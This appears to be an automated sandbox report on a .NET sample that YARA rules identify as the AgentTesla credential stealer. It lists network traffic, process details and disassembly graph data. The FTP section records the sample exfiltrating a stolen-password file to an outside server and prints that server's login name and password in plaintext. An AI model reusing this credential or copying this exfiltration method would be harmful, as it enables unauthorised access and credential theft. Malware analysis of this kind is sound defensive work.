                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Mar 20, 2023 18:32:25.445375919 CET49698443192.168.2.5173.231.16.76
                                                                                Mar 20, 2023 18:32:25.445451021 CET44349698173.231.16.76192.168.2.5
                                                                                Mar 20, 2023 18:32:25.445578098 CET49698443192.168.2.5173.231.16.76
                                                                                Mar 20, 2023 18:32:25.496216059 CET49698443192.168.2.5173.231.16.76
                                                                                Mar 20, 2023 18:32:25.496239901 CET44349698173.231.16.76192.168.2.5
                                                                                Mar 20, 2023 18:32:26.153322935 CET44349698173.231.16.76192.168.2.5
                                                                                Mar 20, 2023 18:32:26.153417110 CET49698443192.168.2.5173.231.16.76
                                                                                Mar 20, 2023 18:32:26.161086082 CET49698443192.168.2.5173.231.16.76
                                                                                Mar 20, 2023 18:32:26.161137104 CET44349698173.231.16.76192.168.2.5
                                                                                Mar 20, 2023 18:32:26.161732912 CET44349698173.231.16.76192.168.2.5
                                                                                Mar 20, 2023 18:32:26.366749048 CET44349698173.231.16.76192.168.2.5
                                                                                Mar 20, 2023 18:32:26.366868019 CET49698443192.168.2.5173.231.16.76
                                                                                Mar 20, 2023 18:32:26.482625961 CET49698443192.168.2.5173.231.16.76
                                                                                Mar 20, 2023 18:32:26.482650042 CET44349698173.231.16.76192.168.2.5
                                                                                Mar 20, 2023 18:32:26.639955044 CET44349698173.231.16.76192.168.2.5
                                                                                Mar 20, 2023 18:32:26.640053988 CET44349698173.231.16.76192.168.2.5
                                                                                Mar 20, 2023 18:32:26.640136957 CET49698443192.168.2.5173.231.16.76
                                                                                Mar 20, 2023 18:32:26.641061068 CET49698443192.168.2.5173.231.16.76
                                                                                Mar 20, 2023 18:32:33.120982885 CET4969921192.168.2.5190.107.177.239
                                                                                Mar 20, 2023 18:32:33.345351934 CET2149699190.107.177.239192.168.2.5
                                                                                Mar 20, 2023 18:32:33.345468044 CET4969921192.168.2.5190.107.177.239
                                                                                Mar 20, 2023 18:32:33.570523024 CET2149699190.107.177.239192.168.2.5
                                                                                Mar 20, 2023 18:32:33.570781946 CET4969921192.168.2.5190.107.177.239
                                                                                Mar 20, 2023 18:32:33.794442892 CET2149699190.107.177.239192.168.2.5
                                                                                Mar 20, 2023 18:32:33.794506073 CET2149699190.107.177.239192.168.2.5
                                                                                Mar 20, 2023 18:32:33.797815084 CET4969921192.168.2.5190.107.177.239
                                                                                Mar 20, 2023 18:32:34.036129951 CET2149699190.107.177.239192.168.2.5
                                                                                Mar 20, 2023 18:32:34.036413908 CET4969921192.168.2.5190.107.177.239
                                                                                Mar 20, 2023 18:32:34.259531975 CET2149699190.107.177.239192.168.2.5
                                                                                Mar 20, 2023 18:32:34.259732962 CET4969921192.168.2.5190.107.177.239
                                                                                Mar 20, 2023 18:32:34.483745098 CET2149699190.107.177.239192.168.2.5
                                                                                Mar 20, 2023 18:32:34.483958006 CET4969921192.168.2.5190.107.177.239
                                                                                Mar 20, 2023 18:32:34.707490921 CET2149699190.107.177.239192.168.2.5
                                                                                Mar 20, 2023 18:32:34.707700014 CET4969921192.168.2.5190.107.177.239
                                                                                Mar 20, 2023 18:32:34.930713892 CET2149699190.107.177.239192.168.2.5
                                                                                Mar 20, 2023 18:32:34.932552099 CET4970054926192.168.2.5190.107.177.239
                                                                                Mar 20, 2023 18:32:35.060767889 CET4969921192.168.2.5190.107.177.239
                                                                                Mar 20, 2023 18:32:35.158899069 CET5492649700190.107.177.239192.168.2.5
                                                                                Mar 20, 2023 18:32:35.159116030 CET4970054926192.168.2.5190.107.177.239
                                                                                Mar 20, 2023 18:32:35.159385920 CET4969921192.168.2.5190.107.177.239
                                                                                Mar 20, 2023 18:32:35.383680105 CET2149699190.107.177.239192.168.2.5
                                                                                Mar 20, 2023 18:32:35.384138107 CET4970054926192.168.2.5190.107.177.239
                                                                                Mar 20, 2023 18:32:35.384181976 CET4970054926192.168.2.5190.107.177.239
                                                                                Mar 20, 2023 18:32:35.560923100 CET4969921192.168.2.5190.107.177.239
                                                                                Mar 20, 2023 18:32:35.609081030 CET5492649700190.107.177.239192.168.2.5
                                                                                Mar 20, 2023 18:32:35.609458923 CET5492649700190.107.177.239192.168.2.5
                                                                                Mar 20, 2023 18:32:35.609611034 CET4970054926192.168.2.5190.107.177.239
                                                                                Mar 20, 2023 18:32:35.610061884 CET2149699190.107.177.239192.168.2.5
                                                                                Mar 20, 2023 18:32:35.670270920 CET4969921192.168.2.5190.107.177.239

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Mar 20, 2023 18:32:25.379782915 CET5029553192.168.2.58.8.8.8
                                                                                Mar 20, 2023 18:32:25.400003910 CET53502958.8.8.8192.168.2.5
                                                                                Mar 20, 2023 18:32:25.412838936 CET6084153192.168.2.58.8.8.8
                                                                                Mar 20, 2023 18:32:25.435102940 CET53608418.8.8.8192.168.2.5
                                                                                Mar 20, 2023 18:32:32.898178101 CET6189353192.168.2.58.8.8.8
                                                                                Mar 20, 2023 18:32:33.119693041 CET53618938.8.8.8192.168.2.5

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Mar 20, 2023 18:32:25.379782915 CET192.168.2.58.8.8.80xc630Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:32:25.412838936 CET192.168.2.58.8.8.80x4bf1Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:32:32.898178101 CET192.168.2.58.8.8.80x4e5Standard query (0)ftp.valvulasthermovalve.clA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Mar 20, 2023 18:32:25.400003910 CET8.8.8.8192.168.2.50xc630No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                Mar 20, 2023 18:32:25.400003910 CET8.8.8.8192.168.2.50xc630No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:32:25.400003910 CET8.8.8.8192.168.2.50xc630No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:32:25.400003910 CET8.8.8.8192.168.2.50xc630No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:32:25.435102940 CET8.8.8.8192.168.2.50x4bf1No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                Mar 20, 2023 18:32:25.435102940 CET8.8.8.8192.168.2.50x4bf1No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:32:25.435102940 CET8.8.8.8192.168.2.50x4bf1No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:32:25.435102940 CET8.8.8.8192.168.2.50x4bf1No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:32:33.119693041 CET8.8.8.8192.168.2.50x4e5No error (0)ftp.valvulasthermovalve.cl190.107.177.239A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • api.ipify.org

                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.549698173.231.16.76443C:\Users\user\Desktop\Q4YODvoYjL.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-03-20 17:32:26 UTC0OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                Host: api.ipify.org
                                                                                Connection: Keep-Alive
                                                                                2023-03-20 17:32:26 UTC0INHTTP/1.1 200 OK
                                                                                Content-Length: 14
                                                                                Content-Type: text/plain
                                                                                Date: Mon, 20 Mar 2023 17:32:26 GMT
                                                                                Vary: Origin
                                                                                Connection: close
                                                                                2023-03-20 17:32:26 UTC0INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38
                                                                                Data Ascii: 102.129.143.78


                                                                                FTP Packets

                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                Mar 20, 2023 18:32:33.570523024 CET2149699190.107.177.239192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.
                                                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 14:32. Server port: 21.
                                                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 14:32. Server port: 21.220-This is a private system - No anonymous login
                                                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 14:32. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 14:32. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                Mar 20, 2023 18:32:33.570781946 CET4969921192.168.2.5190.107.177.239USER cva19491@valvulasthermovalve.cl
                                                                                Mar 20, 2023 18:32:33.794506073 CET2149699190.107.177.239192.168.2.5331 User cva19491@valvulasthermovalve.cl OK. Password required
                                                                                Mar 20, 2023 18:32:33.797815084 CET4969921192.168.2.5190.107.177.239PASS LILKOOLL14!!
                                                                                Mar 20, 2023 18:32:34.036129951 CET2149699190.107.177.239192.168.2.5230 OK. Current restricted directory is /
                                                                                Mar 20, 2023 18:32:34.259531975 CET2149699190.107.177.239192.168.2.5200 OK, UTF-8 enabled
                                                                                Mar 20, 2023 18:32:34.259732962 CET4969921192.168.2.5190.107.177.239PWD
                                                                                Mar 20, 2023 18:32:34.483745098 CET2149699190.107.177.239192.168.2.5257 "/" is your current location
                                                                                Mar 20, 2023 18:32:34.483958006 CET4969921192.168.2.5190.107.177.239TYPE I
                                                                                Mar 20, 2023 18:32:34.707490921 CET2149699190.107.177.239192.168.2.5200 TYPE is now 8-bit binary
                                                                                Mar 20, 2023 18:32:34.707700014 CET4969921192.168.2.5190.107.177.239PASV
                                                                                Mar 20, 2023 18:32:34.930713892 CET2149699190.107.177.239192.168.2.5227 Entering Passive Mode (190,107,177,239,214,142)
                                                                                Mar 20, 2023 18:32:35.159385920 CET4969921192.168.2.5190.107.177.239STOR PW_user-632922_2023_03_20_18_32_31.html
                                                                                Mar 20, 2023 18:32:35.383680105 CET2149699190.107.177.239192.168.2.5150 Accepted data connection
                                                                                Mar 20, 2023 18:32:35.610061884 CET2149699190.107.177.239192.168.2.5226-File successfully transferred
                                                                                226-File successfully transferred226 0.225 seconds (measured here), 1.52 Kbytes per second

                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:18:32:02
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\Desktop\Q4YODvoYjL.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\Desktop\Q4YODvoYjL.exe
                                                                                Imagebase:0x820000
                                                                                File size:743936 bytes
                                                                                MD5 hash:E30C67B19383F259D7414B763049EB2F
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Reputation:low

                                                                                General

                                                                                Target ID:1
                                                                                Start time:18:32:23
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\Desktop\Q4YODvoYjL.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\Desktop\Q4YODvoYjL.exe
                                                                                Imagebase:0x5a0000
                                                                                File size:743936 bytes
                                                                                MD5 hash:E30C67B19383F259D7414B763049EB2F
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:13.2%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:172
                                                                                  Total number of Limit Nodes:3
                                                                                  execution_graph 17730 5152f60 17733 5152f90 17730->17733 17734 5152fd2 17733->17734 17736 5152f7a 17733->17736 17735 515302a CallWindowProcW 17734->17735 17734->17736 17735->17736 17737 51555c0 17738 51555ed 17737->17738 17759 5154264 17738->17759 17740 5155694 17741 5154264 3 API calls 17740->17741 17742 51556c6 17741->17742 17743 5154264 3 API calls 17742->17743 17744 51556f8 17743->17744 17745 5154264 3 API calls 17744->17745 17746 515572a 17745->17746 17747 5154264 3 API calls 17746->17747 17748 515575c 17747->17748 17764 5154fd4 17748->17764 17750 51557fe 17751 5154fd4 3 API calls 17750->17751 17752 5155830 17751->17752 17753 5154fd4 3 API calls 17752->17753 17754 5155862 17753->17754 17768 5154ff4 17754->17768 17756 51558c6 17757 5154ff4 3 API calls 17756->17757 17758 515592a 17757->17758 17760 515426f 17759->17760 17772 11e7ea2 17760->17772 17780 11e6e20 17760->17780 17761 5158848 17761->17740 17765 5154fdf 17764->17765 17874 5155438 17765->17874 17767 5158be5 17767->17750 17769 5154fff 17768->17769 17879 515910c 17769->17879 17771 5159d4a 17771->17756 17773 11e7edb 17772->17773 17775 11e813e 17773->17775 17788 51588d0 17773->17788 17792 5159430 17773->17792 17774 11e817c 17774->17761 17775->17774 17795 11ec038 17775->17795 17800 11ec048 17775->17800 17781 11e6e2b 17780->17781 17783 11e813e 17781->17783 17786 51588d0 3 API calls 17781->17786 17787 5159430 3 API calls 17781->17787 17782 11e817c 17782->17761 17783->17782 17784 11ec038 3 API calls 17783->17784 17785 11ec048 3 API calls 17783->17785 17784->17782 17785->17782 17786->17783 17787->17783 17805 11ea028 17788->17805 17813 11ea017 17788->17813 17789 51588dd 17789->17775 17833 51594c8 17792->17833 17793 515943f 17793->17775 17796 11ec069 17795->17796 17797 11ec08d 17796->17797 17837 11ec1f8 17796->17837 17841 11ec1e8 17796->17841 17797->17774 17801 11ec069 17800->17801 17802 11ec08d 17801->17802 17803 11ec1f8 3 API calls 17801->17803 17804 11ec1e8 3 API calls 17801->17804 17802->17774 17803->17802 17804->17802 17806 11ea03b 17805->17806 17807 11ea053 17806->17807 17821 11ea2b0 17806->17821 17825 11ea2a0 17806->17825 17807->17789 17808 11ea04b 17808->17807 17809 11ea250 GetModuleHandleW 17808->17809 17810 11ea27d 17809->17810 17810->17789 17814 11ea03b 17813->17814 17815 11ea053 17814->17815 17819 11ea2b0 LoadLibraryExW 17814->17819 17820 11ea2a0 LoadLibraryExW 17814->17820 17815->17789 17816 11ea04b 17816->17815 17817 11ea250 GetModuleHandleW 17816->17817 17818 11ea27d 17817->17818 17818->17789 17819->17816 17820->17816 17823 11ea2c4 17821->17823 17822 11ea2e9 17822->17808 17823->17822 17829 11e93d8 17823->17829 17826 11ea2c4 17825->17826 17827 11e93d8 LoadLibraryExW 17826->17827 17828 11ea2e9 17826->17828 17827->17828 17828->17808 17830 11ea490 LoadLibraryExW 17829->17830 17832 11ea509 17830->17832 17832->17822 17835 11ea028 2 API calls 17833->17835 17836 11ea017 2 API calls 17833->17836 17834 51594d7 17834->17793 17835->17834 17836->17834 17838 11ec205 17837->17838 17839 11ec23f 17838->17839 17845 11ea9c4 17838->17845 17839->17797 17842 11ec205 17841->17842 17843 11ec23f 17842->17843 17844 11ea9c4 3 API calls 17842->17844 17843->17797 17844->17843 17846 11ea9cf 17845->17846 17848 11ecf38 17846->17848 17849 11ec574 17846->17849 17848->17848 17850 11ec57f 17849->17850 17851 11e6e20 3 API calls 17850->17851 17852 11ecfa7 17851->17852 17856 11eed30 17852->17856 17862 11eed18 17852->17862 17853 11ecfe0 17853->17848 17858 11eed61 17856->17858 17859 11eedad 17856->17859 17857 11eed6d 17857->17853 17858->17857 17867 11ef19f 17858->17867 17871 11ef1b0 17858->17871 17859->17853 17863 11eed23 17862->17863 17864 11eed6d 17863->17864 17865 11ef19f 2 API calls 17863->17865 17866 11ef1b0 2 API calls 17863->17866 17864->17853 17865->17864 17866->17864 17868 11ef1a3 17867->17868 17869 11ea028 2 API calls 17868->17869 17870 11ef1b9 17869->17870 17870->17859 17872 11ea028 2 API calls 17871->17872 17873 11ef1b9 17871->17873 17872->17873 17873->17859 17875 5155443 17874->17875 17877 11e7ea2 3 API calls 17875->17877 17878 11e6e20 3 API calls 17875->17878 17876 5158f8c 17876->17767 17877->17876 17878->17876 17880 5159117 17879->17880 17884 11e78b8 17880->17884 17888 11e6dc0 17880->17888 17881 515a2a9 17881->17771 17885 11e78e9 17884->17885 17892 11e6df0 17885->17892 17887 11e7922 17887->17881 17889 11e6dcb 17888->17889 17890 11e6df0 3 API calls 17889->17890 17891 11e7922 17890->17891 17891->17881 17893 11e6dfb 17892->17893 17894 11e6e20 3 API calls 17893->17894 17895 11e7a22 17894->17895 17895->17887 17896 11ec310 17897 11ec376 17896->17897 17901 11ec8d8 17897->17901 17904 11ec8d2 17897->17904 17898 11ec425 17907 11ea9e4 17901->17907 17905 11ec906 17904->17905 17906 11ea9e4 DuplicateHandle 17904->17906 17905->17898 17906->17905 17908 11ec940 DuplicateHandle 17907->17908 17909 11ec906 17908->17909 17909->17898 17910 11e9f30 17912 11ea028 2 API calls 17910->17912 17913 11ea017 2 API calls 17910->17913 17911 11e9f3f 17912->17911 17913->17911 17914 11e40d0 17915 11e40e2 17914->17915 17916 11e40ee 17915->17916 17920 11e41e0 17915->17920 17925 11e3c64 17916->17925 17918 11e410d 17921 11e4205 17920->17921 17929 11e42d0 17921->17929 17933 11e42e0 17921->17933 17926 11e3c6f 17925->17926 17941 11e51a4 17926->17941 17928 11e7241 17928->17918 17931 11e4307 17929->17931 17930 11e43e4 17930->17930 17931->17930 17937 11e3de8 17931->17937 17934 11e4307 17933->17934 17935 11e3de8 CreateActCtxA 17934->17935 17936 11e43e4 17934->17936 17935->17936 17938 11e5370 CreateActCtxA 17937->17938 17940 11e5433 17938->17940 17942 11e51af 17941->17942 17943 11e6dc0 3 API calls 17942->17943 17944 11e784d 17943->17944 17944->17928

                                                                                  Executed Functions

                                                                                  Function 011EA028 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 622 11ea028-11ea030 623 11ea03b-11ea03d 622->623 624 11ea036 call 11e9370 622->624 625 11ea03f 623->625 626 11ea053-11ea057 623->626 624->623 676 11ea045 call 11ea2b0 625->676 677 11ea045 call 11ea2a0 625->677 627 11ea06b-11ea0ac 626->627 628 11ea059-11ea063 626->628 633 11ea0ae-11ea0b6 627->633 634 11ea0b9-11ea0c7 627->634 628->627 629 11ea04b-11ea04d 629->626 630 11ea188-11ea248 629->630 671 11ea24a-11ea24d 630->671 672 11ea250-11ea27b GetModuleHandleW 630->672 633->634 636 11ea0eb-11ea0ed 634->636 637 11ea0c9-11ea0ce 634->637 638 11ea0f0-11ea0f7 636->638 639 11ea0d9 637->639 640 11ea0d0-11ea0d7 call 11e937c 637->640 643 11ea0f9-11ea101 638->643 644 11ea104-11ea10b 638->644 645 11ea0db-11ea0e9 639->645 640->645 643->644 647 11ea10d-11ea115 644->647 648 11ea118-11ea121 call 11e938c 644->648 645->638 647->648 653 11ea12e-11ea133 648->653 654 11ea123-11ea12b 648->654 655 11ea135-11ea13c 653->655 656 11ea151-11ea155 653->656 654->653 655->656 658 11ea13e-11ea14e call 11e939c call 11e93ac 655->658 678 11ea158 call 11ea5a8 656->678 679 11ea158 call 11ea599 656->679 658->656 659 11ea15b-11ea15e 661 11ea160-11ea17e 659->661 662 11ea181-11ea187 659->662 661->662 671->672 673 11ea27d-11ea283 672->673 674 11ea284-11ea298 672->674 673->674 676->629 677->629 678->659 679->659
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 011EA26E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: 7d07db7e2413bce49379f08a2964740afcd5e9faf59c015f010730a179d479da
                                                                                  • Instruction ID: fa495061b3a801cb54886adad3c78e35e3c8734fdfd22400174bfefdab9ea56c
                                                                                  • Opcode Fuzzy Hash: 7d07db7e2413bce49379f08a2964740afcd5e9faf59c015f010730a179d479da
                                                                                  • Instruction Fuzzy Hash: C2712570A00B058FDB28DFA9D44475ABBF1BF88344F00892EE48AD7A50DB35E845CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 011E5364 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 680 11e5364-11e5431 CreateActCtxA 682 11e543a-11e5494 680->682 683 11e5433-11e5439 680->683 690 11e5496-11e5499 682->690 691 11e54a3-11e54a7 682->691 683->682 690->691 692 11e54b8 691->692 693 11e54a9-11e54b5 691->693 695 11e54b9 692->695 693->692 695->695
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 011E5421
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: a3e1bb2063a8098593ea211096ce7897b1047b12af867eeb7792688ddd632460
                                                                                  • Instruction ID: 54cf64c34b92ed92f62f459382d038675e030da32c47bf8d477cce845596dbaf
                                                                                  • Opcode Fuzzy Hash: a3e1bb2063a8098593ea211096ce7897b1047b12af867eeb7792688ddd632460
                                                                                  • Instruction Fuzzy Hash: 074104B1D0061DCEDB24DFA9C9887DEBBF1BF48304F20806AD409AB251E7B55946CFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 011E3DE8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 696 11e3de8-11e5431 CreateActCtxA 699 11e543a-11e5494 696->699 700 11e5433-11e5439 696->700 707 11e5496-11e5499 699->707 708 11e54a3-11e54a7 699->708 700->699 707->708 709 11e54b8 708->709 710 11e54a9-11e54b5 708->710 712 11e54b9 709->712 710->709 712->712
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 011E5421
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 028751832d87eb5ab9b8ea6c0ac59c6cced051bbe64734e492f29b52155349e1
                                                                                  • Instruction ID: b845a0113790e5c886cba5ff5854407671753fc2233618c4d63d14acd35bc606
                                                                                  • Opcode Fuzzy Hash: 028751832d87eb5ab9b8ea6c0ac59c6cced051bbe64734e492f29b52155349e1
                                                                                  • Instruction Fuzzy Hash: E241F170D0061DCFDB24DFA9C88879EBBF6BF48304F20806AD409AB251D7B56945CFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 05152F90 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 713 5152f90-5152fcc 714 5152fd2-5152fd7 713->714 715 515307c-515309c 713->715 716 5152fd9-5153010 714->716 717 515302a-5153062 CallWindowProcW 714->717 721 515309f-51530ac 715->721 723 5153012-5153018 716->723 724 5153019-5153028 716->724 719 5153064-515306a 717->719 720 515306b-515307a 717->720 719->720 720->721 723->724 724->721
                                                                                  APIs
                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 05153051
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.352327181.0000000005150000.00000040.00000800.00020000.00000000.sdmp, Offset: 05150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5150000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallProcWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2714655100-0
                                                                                  • Opcode ID: 6d22768c682d0f83613b4c9d96a2ce4196bce72855c4dc23d0779bb36566d8ca
                                                                                  • Instruction ID: 45cc189c330f85f7fce6fe173565d309a0707330a89a87d241a3ed68940bab35
                                                                                  • Opcode Fuzzy Hash: 6d22768c682d0f83613b4c9d96a2ce4196bce72855c4dc23d0779bb36566d8ca
                                                                                  • Instruction Fuzzy Hash: D9410AB5900305DFCB14CF99C488AAEBBF5FF88324F258859D429AB361D775A841CFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 011EA9E4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 727 11ea9e4-11ec9d4 DuplicateHandle 729 11ec9dd-11ec9fa 727->729 730 11ec9d6-11ec9dc 727->730 730->729
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,011EC906,?,?,?,?,?), ref: 011EC9C7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 720cddd1ba66a500eb306b60b40704e15038acb219a4ed36ac559e353afd63aa
                                                                                  • Instruction ID: aab411708116d14373beaa693cf96185e0290bd83033dfa8b62cf6e7f8f933d4
                                                                                  • Opcode Fuzzy Hash: 720cddd1ba66a500eb306b60b40704e15038acb219a4ed36ac559e353afd63aa
                                                                                  • Instruction Fuzzy Hash: 5121E3B5900609AFDB10CF9AD984ADEFFF4EB48320F14841AE914B7310D374A944DFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 011EC938 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 733 11ec938-11ec9d4 DuplicateHandle 734 11ec9dd-11ec9fa 733->734 735 11ec9d6-11ec9dc 733->735 735->734
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,011EC906,?,?,?,?,?), ref: 011EC9C7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: ae0d8f864548ddeefe10d7600d75f8a5bacdd0798ebde238c734c604af754e25
                                                                                  • Instruction ID: 7d41472ffdf5a40d2c6bf5a7cd05137df96069d8bd1314b1a103bfbffc695ca8
                                                                                  • Opcode Fuzzy Hash: ae0d8f864548ddeefe10d7600d75f8a5bacdd0798ebde238c734c604af754e25
                                                                                  • Instruction Fuzzy Hash: 9621E3B6D002499FDB10CFA9D984ADEBFF4FB48320F14841AE954B7210D374AA44DFA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 011E93D8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
